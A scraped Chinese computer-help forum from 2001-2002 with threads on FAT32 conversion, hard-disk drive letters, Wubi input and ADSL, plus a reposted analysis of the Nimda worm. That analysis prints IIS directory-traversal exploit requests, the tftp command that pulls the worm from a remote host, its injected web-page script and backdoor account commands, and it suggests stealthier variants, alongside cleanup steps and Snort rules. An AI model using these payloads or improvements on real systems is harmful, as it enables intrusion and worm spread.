簇（硬盘中资料储存的最小单位）有一定的大小（2KB/4KB/8KB/16KB/32KB），这是根据所使用的文件系统及分区的大小决定的，而无论写入磁盘的资料有多小，都将至少占据一个簇的空间。

瑞星没用过，不清楚为什么。

Messerschmitt

初级用户
积分：11
发帖：9
来自：1942～1943德军东
注册：2001-11-18
 发表于 2001-11-18 18:05:35 按此观看Messerschmitt的个人资料 按此发邮件给Messerschmitt 发送悄悄话给Messerschmitt 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Messerschmitt的IP
直接和她说转fat32不就得了

messerschmitt Me109
灰姑娘1975

终级用户
积分：455
发帖：173
来自：北京
注册：2001-07-02
 发表于 2001-11-18 19:54:36 按此观看灰姑娘1975的个人资料 按此发邮件给灰姑娘1975 灰姑娘1975 的 oicq 是1825520,查看 1825520 的资料 发送悄悄话给灰姑娘1975 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看灰姑娘1975的IP
是不是说，文件小但是很多的话就会多占空间，那转成32会有什么好处，怎么转？另外谢谢小诺!

菜鸟一只，拜托拜托！*^_^*
chew000

初级用户
积分：4
发帖：12
来自：中华人民共和国重庆市
注册：2000-09-20
 发表于 2001-11-18 20:46:46 chew000 的 oicq 是3443839,查看 3443839 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
灰姑娘1975在上个帖子中说
引用:
是不是说，文件小但是很多的话就会多占空间，那转成32会有什么好处，怎么转？另外谢谢小诺!

I CAN HANDLE IT!

你只需要在`控制面板`中的`添加与删除程序`里的`windows安装程序`选项卡里的`系统工具`的详细资料中添加FAT32转换程序然后再转换就行了..
转换成FAT32分区的好处在于存放大量小文件时可减少点用的空间数量 且WINDOW98会运行更流畅...

也可以安装个partionmagic5 来转换更方便一些..

If me got an idea.....
灰姑娘1975

终级用户
积分：455
发帖：173
来自：北京
注册：2001-07-02
 发表于 2001-11-19 10:05:55 按此观看灰姑娘1975的个人资料 按此发邮件给灰姑娘1975 灰姑娘1975 的 oicq 是1825520,查看 1825520 的资料 发送悄悄话给灰姑娘1975 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看灰姑娘1975的IP
邱贤涛在上个帖子中说
引用:
灰姑娘1975在上个帖子中说
引用:
是不是说，文件小但是很多的话就会多占空间，那转成32会有什么好处，怎么转？另外谢谢小诺!

I CAN HANDLE IT!

你只需要在`控制面板`中的`添加与删除程序`里的`windows安装程序`选项卡里的`系统工具`的详细资料中添加FAT32转换程序然后再转换就行了..
转换成FAT32分区的好处在于存放大量小文件时可减少点用的空间数量 且WINDOW98会运行更流畅...

也可以安装个partionmagic5 来转换更方便一些..

谢谢，我这就改

菜鸟一只，拜托拜托！*^_^*
cfluodongyu2

初级用户
积分：127
发帖：32
来自：
注册：2002-05-18
 发表于 2002-05-18 14:54:01 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
杀毒后硬盘空间变小是不是杀毒过程中瑞星备份了一些内容啊!

好的交流能使我们走近完美！
上一贴 | 下一贴
快速回复 | 主题：怎样释放硬盘空间
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何让我得新加得硬盘得分区排在老硬盘得后面

计算机技术
如何让我得新加得硬盘得分区排在老硬盘得后面

上一贴 | 下一贴
发表人 主题: 如何让我得新加得硬盘得分区排在老硬盘得后面
西门吹牛

终级用户
积分：692
发帖：281
来自：杭州
注册：2000-09-29
 发表于 2002-01-22 18:08:21 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 收藏该主题供以后查看 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP
加一块硬盘,想他得分区不会与老的交错,如何在bois中设定?

我将一直寻找下去......
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-22 19:28:12 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
先把你的两快硬盘的主从顺序调好（用跳线），然后从盘不要用主分区

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2002-01-22 20:30:34 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
开机后后挂的一个硬盘不要让cmos里面自动检测~

用双线后挂的硬盘跳线为从盘

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

肖天

超级用户
积分：347
发帖：90
来自：黑龙江省
注册：2001-06-28
 发表于 2002-01-22 22:49:17 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP
不用在CMOS中设置，老硬盘参数不变，其他硬盘参数都设为NONE，这样开机98中就不会出现盘符交错的问题

good good study ,day day up!
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-23 10:50:48 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
首先,不要把新硬盘和原来的硬盘装在一个IDE接口上,因为接在一个IDE接口上的两个硬盘不能同时存取.
把新硬盘和光驱接在一条数据线上,设置硬盘为主盘,光驱为从盘.进入BIOS,选择IDE HDD AUTO DETECTION,让BIOS自动识别硬盘,找到新硬盘后,说明安装成功.再在STANDARD CMOS SETUP中,把新硬盘设为None,开机后windows就会按照先后顺序排列原来的硬盘和新硬盘的盘符了.

Dripping water wears away a stone.
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 19:04:12 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
用2000或者 xp吧

在控制面板里计算机管理中指定分区就轻松搞定了

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2002-01-25 19:17:55 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
ImHow在上个帖子中说
引用:
先把你的两快硬盘的主从顺序调好（用跳线），然后从盘不要用主分区

这是最好的办法~~~

木有签名#@$%
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-26 10:29:09 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
DayinNightout在上个帖子中说
引用:
ImHow在上个帖子中说
引用:
先把你的两快硬盘的主从顺序调好（用跳线），然后从盘不要用主分区

这是最好的办法~~~

恩，确实，不过这样从盘就是纯粹的资料盘了，不能再装什么操作系统，以后不能用来应急

Blueidea Web Team.
Moderator Of Computer Technology Forum
redsteps

红烧脚丫
现任版主
积分：2759
发帖：737
来自：济南
注册：2001-03-14
 发表于 2002-01-26 10:33:11 按此观看redsteps的个人资料 按此发邮件给redsteps 访问redsteps的主页 redsteps 的 oicq 是552179,查看 552179 的资料 发送悄悄话给redsteps 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redsteps的IP
yunbin在上个帖子中说
引用:
开机后后挂的一个硬盘不要让cmos里面自动检测~

用双线后挂的硬盘跳线为从盘

这才是最好的办法，win98可以自动识别出硬盘来

www.currentframe.com

Blueidea Web Team
Moderator Of Flash Forum

cfluodongyu2

初级用户
积分：127
发帖：32
来自：
注册：2002-05-18
 发表于 2002-05-18 14:50:36 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
把第二块硬盘主分区分1M大小,然后再删除它,挂好.OK
我发发觉我成长变快了.呵

好的交流能使我们走近完美！
wangfeng

高级用户
积分：280
发帖：91
来自：辽宁
注册：2001-12-23
 发表于 2002-05-18 19:52:11 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
楼上的 是不是脸皮成长快了啊

我曾经问个不休？……？
flash_sword

永不言败
积分：2304
发帖：619
来自：Guangdong,Ch
注册：2000-01-16
 发表于 2002-05-19 11:22:21 flash_sword 的 oicq 是43104,查看 43104 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
肖天在上个帖子中说
引用:
不用在CMOS中设置，老硬盘参数不变，其他硬盘参数都设为NONE，这样开机98中就不会出现盘符交错的问题

是这样的。
楼上的len说得很对。
如果你的操作系统是win2K以上版本的话，系统会自动将从盘的分区符后移。
win2K下可以设置活动分区以及更改盘符，很方便。

.::Great Minds Think Alike::.
上一贴 | 下一贴
快速回复 | 主题：如何让我得新加得硬盘得分区排在老硬盘得后面
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2000的五笔加入

计算机技术
win2000的五笔加入

上一贴 | 下一贴
发表人 主题: win2000的五笔加入
jill

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-17 18:58:20 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
请问各位高手，在WIN2000中五笔字形输入法如何加入，安了OFFICE2000也无法加五笔输入法，我应怎样加？谢谢！

誓与WIN2000共存
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-12-17 19:20:49 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
office2000的根目录下有个Msime文件夹，然后点击里面的setup，照着做就可以了

好好学习，努力做事
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-17 19:48:49 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
楼上讲的输入法是微软拼音输入法
但是五笔86版和98版都包括在其中

你先安装微软拼音
之后就会出现五笔的安装选项

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
风云突变

终级用户
积分：637
发帖：141
来自：风云工作室
注册：2001-12-01
 发表于 2001-12-17 20:17:58 按此观看风云突变的个人资料 按此发邮件给风云突变 风云突变 的 oicq 是5477342,查看 5477342 的资料 发送悄悄话给风云突变 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风云突变的IP
去下载一个陈桥五笔（智能五笔）很好用的

N神
JILL

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-18 16:30:00 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
多谢上面几位兄弟

誓与WIN2000共存
ayoung

超级用户
积分：403
发帖：158
来自：北京
注册：2000-11-14
 发表于 2001-12-19 15:17:54 按此观看ayoung的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ayoung 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ayoung的IP
风云突变在上个帖子中说
引用:
去下载一个陈桥五笔（智能五笔）很好用的

我现在用的是万能五笔，什么都好，就是在msn上打汉字出问题，而且用的时间长了会出问题。

^忘忧草^幸运草^
上一贴 | 下一贴
快速回复 | 主题：win2000的五笔加入
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


对尼姆达蠕虫的详细分析(转贴)

计算机技术
对尼姆达蠕虫的详细分析(转贴)

上一贴 | 下一贴
发表人 主题: 对尼姆达蠕虫的详细分析(转贴)
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-01-18 21:27:41 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 收藏该主题供以后查看 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
今天在找些资料，顺便贴些上来，如有类同,请版主把它删除,谢谢!

作者：tombkeeper

2001.9.18晚，我习惯性的打开了tcp/80，用这个简单的批处理程序：
-------------cut here-----------
@echo off
:start
nc -vv -w 5 -l -p 80>>httpd.log
goto start
--------------------------------
通常我用它来监测CodeXXX之类的分布，另外还指望运气好能弄到个把变种。
虽然偶尔会收到几个扫描代理服务器的噪声，但一般都是"rcvd 3818"。
忽然我发现从某个IP来了连续的几个一百字节左右的数据，打开httpd.log
一看原来是是一个http扫描，目的是寻找unicode_hole和CodeRedII建立的
root.exe。我没理它，可是在不到5分钟的时间里我连续收到了几个发自不
同IP的同种扫描，难道这就是CodeBlue？我开了一个真正的honeypot，不管
对方GET什么都回应"200 OK"，结果马上就看到了实质性的东西：
"GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0"
好，满足你的要求。运行"tftp -i xxx.xxx.xxx.xxx GET Admin.dll"，结
果马上就得到了好东西，赶紧反编译一下看看，然后再……@#$……%^&……
总算弄清楚了个大概，先写一个分析报告吧。

---------------------------------------------------------------

名称：Worm.Concept.57344 (Nimda/尼姆达)
名称：Nimda/尼姆达

一些反病毒厂商的命名：
Worm.Concept.57344
W32/Nimda.A@mm
W32/Nimda@mm
I-Worm.Nimda
类型：蠕虫/病毒
受影响的系统：Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000
大小：57344字节

蠕虫文件：
[mmc.exe]
出现在windows文件夹，蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有
一个mmc.exe，那不是Nimda。

[riched20.dll]
riched20.dll除了出现在windows系统文件夹里，还可能出现在任何有*.doc文件的文件夹里。
因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。

[Admin.dll]
（Admin.dll除了在C:，D:，E:的根目录外还可出现在下面的"TFTP*****"出现的地方）

[load.exe]
出现在windows系统文件夹

[%temp%\readme*.exe]

[TFTP****]
形如TFTP3233。文件位置取决于使用tftp的目录。如果是
"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
那么位置就在"Inetpub\scripts\"。如果是
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
那么位置就在"/scripts/..%c1%1c../"也就是根目录。

/*以上都是蠕虫文件的可执行程序，它们之间的区别只有文件名不同*/

[readme.eml]
这个东西是值得一提的，他利用了IE5（或者说OE5）的一个漏洞。我们知道html格式
的邮件中图片和多媒体文件都是自动打开的，而可执行文件不是。但如果把可执行文件
指定为多媒体类型，也会自动下载打开。下面是readme.eml的一段：
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
另外，如果文件夹是“按web页查看”，那么即使只是用鼠标单击选中readme.eml
也会导致蠕虫的执行，如果把扩展名改为mht也是可以的，但改为htm就不行。

[readme.nws]
同readme.eml，只是出现的几率很小。

[*.exe]
可执行文件被感染，所以可能是任何文件名。

传播方式：

（一）通过email
在internet临时文件夹中读取所有"htm"，"html"文件并从中提取email地址，
从信箱读取email并从中提取SMTP服务器，然后发送readme.eml。

（二）通过unicode_hole或CodeRedII建立的root.exe
unicode_hole我就不多说了，CodeRedII会在IIS的几个可执行目录下放置root.exe
也是尽人皆知，Nimda首先在udp/69上启动一个tftp服务器
然后会作以下扫描
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

一旦发现有弱点的系统就使用类似下面的命令
GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0
把文件传到主机上去，然后再
GET /scripts/Admin.dll HTTP/1.0

（三）通过WWW服务
在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件
所在目录中创建readme.eml，并在文件末加上下面这一行
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。

（四）通过局域网
Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20.dll（原理见前）

（五）以病毒的方式
搜索[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]寻找在远程主机上的可执行文件，
一旦找到，Nimda就会以病毒的方式感染文件。有一点不同的是，它把原文件作为资源存储在新文件中，
运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32.exe，它不会感染winzip32.exe，
可能是作者发现winzip染毒后不能正常运行吧。

确保运行：

病毒采取以下措施确保自己处于活跃状态
1）把自己复制到windows系统文件夹里命名为riched20.dll（原理见前）
2）把自己复制到windows系统文件夹里命名为load.exe，
修改system.ini把
shell=explorer.exe改为
shell=explorer.exe load.exe -dontrunold
使病毒在下次系统启动时运行。

创建后门：
1）Nimda打开的udp/69虽然目的并不是作后门，但的的确确是一个后门。
2）如果有足够权限将调用"net.exe"执行以下系统命令：
net user guest /add
net user guest /active
net user guest ""
net localgroup Administrators guest
net localgroup Guests guest /add
结果是空密码的guest加到了Administrators组中。
2）如果有足够权限将调用"net.exe"执行以下系统命令：
net share c$=c:\
删除[SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security]的所有子键
结果是C:\设为完全共享。

Nimda的一些不足之处：
无论如何Nimda是一个划时代的东西，它显示了作者高超的编程水平和丰富的安全知识，相形之下CodeBlue显得黯淡了很多,
甚至CodeRedII也不能相比，但还是留下了一些遗憾。

1）Nimda用JavaScript的"window.open"函数来打开readme.eml，这并不可靠，稍具安全常识的人都会调整IE的脚本支持
选项，有些人干脆关掉java，但是用下面这个方法就没问题了：
<frameset cols="0,*"><frame src="readme.eml">

2）存在诸多"TFTP****"并不是Nimda的本意，恰恰是作者没考虑周全。
Winnt的tftp在工作时会创建形如"TFTP3233"的临时文件，如果tftp异常终止，临时文件就不能被删除。
unicode_hole本来就不是一个理想的运行程序的方式，再加上Nimda的tftpd部分的一点小缺陷就导致了
在一个目录下出现大批的"TFTP****"。写一个更可靠的tftpd模块或者在程序中加入删除这些临时文件的
代码，会让Nimda隐蔽性更强。

3）用GET而不是HEAD来扫描的确要好，但如果在编码上参照Whisker的"Stealth Mode"改进一下就更完美了。

其它几个常见问题：

1)Nimda什么时候进入我国？
我手头最早的一行日志是：
2001-09-18 13:40:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+tftp%20-i%2061.133.3.126%20GET%20Admin.dll%20Admin.dll 502 -
也就是说肯定早于2001-09-18 13:40:25

2)Nimda的作者是谁？
程序的作者在程序中留下了以下标记：
fsdhqherwqi2001
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
可能对最终找出作者有帮助。

3)为什么说Nimda是“概念”蠕虫？
它可以通过至少五种方式传播
它是一个带exe扩展名的dll，可以做为可执行文件运行，也可作为dll运行。
它有智慧：当它名为Admin.dll被运行时，它会把自己复制到windows文件夹命名为mmc.exe并带上参数"-qusery9bnow"运行。
当它名为readme.exe被运行时，它会把自己复制到%temp%带上参数"-dontrunold"运行.
它会把自己的属性设为“系统”“隐藏”，再改写注册表，使“系统”“隐藏”属性的程序在资源管理器中不可见。
它是一个主机扫描器，一个弱点扫描器，一个后门程序；带有多个Exploit，掌握最新的安全信息；它就是一个黑客。

4）Nimda打开的tftpd@udp/69可以用来传送其他文件吗？
不行。Nimda实现的只是一个最基本的tftpd，不包含打开文件句柄的代码，不存在工作目录，仅可以传送自身。
无论请求的是什么文件名，实际得到的都是Nimda。但这个tftpd模块可能存在缓冲溢出问题。

5）如何清除Nimda？
在文件夹选项里设置“显示所有文件”

删除mmc.exe/load.exe/riched20.dll/admin.dll/readme.eml/readme.exe等所有蠕虫文件。
检查所有大小为57344或79225的文件。
可以使用“查找”工具，搜索包含"fsdhqherwqi2001"的*.exe/*.dll和包含"Kz29vb29oWsrLPh4eisrPb09Pb2"的*.eml/*.nws。

检查system.ini。

检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。

删除C:\的共享

最好再检查一下C:\和D:\有没有explorer.exe，除非确信一定没有感染CodeRedII。

重起系统

6）如何避免Nimda入侵？
根本之道是打补丁：
Unicode漏洞：http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
MIME漏洞：http://www.microsoft.com/technet/security/bulletin/ms01-020.asp
IE5.01 SP2：http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp
IE5.5 SP2：http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp

其他解决方案：
打开IE的“工具-->internet选项-->安全-->自定义级别-->文件下载”选“禁用”。
删除所有不需要的默认虚拟目录，或者只给纯脚本执行权，最好不要把任何web目录放在系统分区。
检查共享设置，Win9X的机器不要开完全共享，可以开只读共享，所有共享都要设置口令。

由于Nimda可以利用CodeRedII创建的后门，所以需打上idq_overflow的补丁，检查C:\和D:\
有没有explorer.exe，检查web目录中有没有root.exe。具体见：
http://www.cnns.net/article/db/1722.htm

7）Nimda发送的邮件有特征吗？
Nimda发送的邮件主题是随机的，但通常很奇怪，譬如下面这个：
Subject: 驛埳pic180pic159pic180pic178pic162pic182desktop
不要轻易以HTML方式打开邮件。

8）Nimda可以被监测吗？
当然可以。下面是我写的一个用于snort的过滤规则：

#----------------------------------------------
# Worm.Nimda Ruleset
# Current Database Updated 09/20/2000
# Contact: tombkeeper - tombkeepr@126.com
#----------------------------------------------

preprocessor http_decode: 80 443 8080
preprocessor minfrag: 128
preprocessor portscan: 12.23.34.45/32 3 5 /var/log/snort_portscan.log
# ^^^^^^^^^^^ ^ ^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^
# | | | |
#Your IP address or Network here+ | | |
# | | |
#Ammount of ports being connected-----+ | |
# in this | |
#Interval (in seconds)------------------+ |
# |
#Log file (path/name)----------------------------------+

preprocessor portscan-ignorehosts:
# Hosts to ignore in portscan detection

#---------------------------------------------
# CHANGE THE NEXT LINE TO REFLECT YOUR NETWORK
# (Single system = your ip/32)
var HOME_NET yournet/subnet
#---------------------------------------------

alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM SCAN!"; flags:PA; content:"/root.exe?/c+dir"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM SCAN!"; flags:PA; content:"/system32/cmd.exe?/c+dir"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM TRANSFER!!"; flags:PA; content:"/root.exe?/c+tftp%20-i"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM TRANSFER!!"; flags:PA; content:"/system32/cmd.exe?/c+tftp%20-i"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM RUN!!!"; flags:PA; content:"/scripts/Admin.dll"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM RUN!!!"; flags:PA; content:"/MSADC/Admin.dll"; nocase;)
alert tcp any any -> any 80 (msg:"W32/Nimda@mm WORM RUN!!!"; flags:PA; content:"/winnt/system32/Admin.dll"; nocase;)
alert udp any 69 -> any any (msg:"W32/Nimda@mm WORM TRANSFER!!"; flags:PA; content:"|15 90 AC 17 36 F7 D8 1B C0 5E 40 5B 5F C9 C2 04 00 55 8B EC 81 EC B0 00|";)
alert tcp any 80 -> any any (msg:"W32/Nimda@mm WORM IN WEB SERVER!!"; flags:PA; content:">window.open("readme.eml"";)
alert tcp any any -> any 25 (msg:"W32/Nimda@mm WORM MAILSEND!!"; flags:PA; content:"UgEAAI1F6Ild6FCNRfxQU2g/AA8AU1NT";)
alert tcp any 110 -> any any (msg:"W32/Nimda@mm WORM MAILRECV!!"; flags:PA; content:"UgEAAI1F6Ild6FCNRfxQU2g/AA8AU1NT";)

一点改进意见：
Nimda用JavaScript的"window.open"函数来打开readme.eml，这并不可靠，稍具安全常识的人都会调整IE的脚本支持
选项，有些人干脆关掉java，但是用下面这个方法就没问题了：
<frameset cols="0,*"><frame src="readme.eml">

作者邮箱：tombkeeper@126.com

[这消息被cjj31编辑过(编辑时间2002-01-19 17:17:10)]

我笨故我菜！

好好学习，天天向上!

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-18 23:26:31 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
不错，

不过请把笑脸转换禁止

不然存下来，怎么看呀！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：对尼姆达蠕虫的详细分析(转贴)
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ADSL上网常见问题集锦

计算机技术
ADSL上网常见问题集锦

上一贴 | 下一贴
发表人 主题: ADSL上网常见问题集锦
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-11 11:20:02 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 收藏该主题供以后查看 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
Error 602 The port is already open
问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接
原因：RasPPPoE没有完全和正确的安装
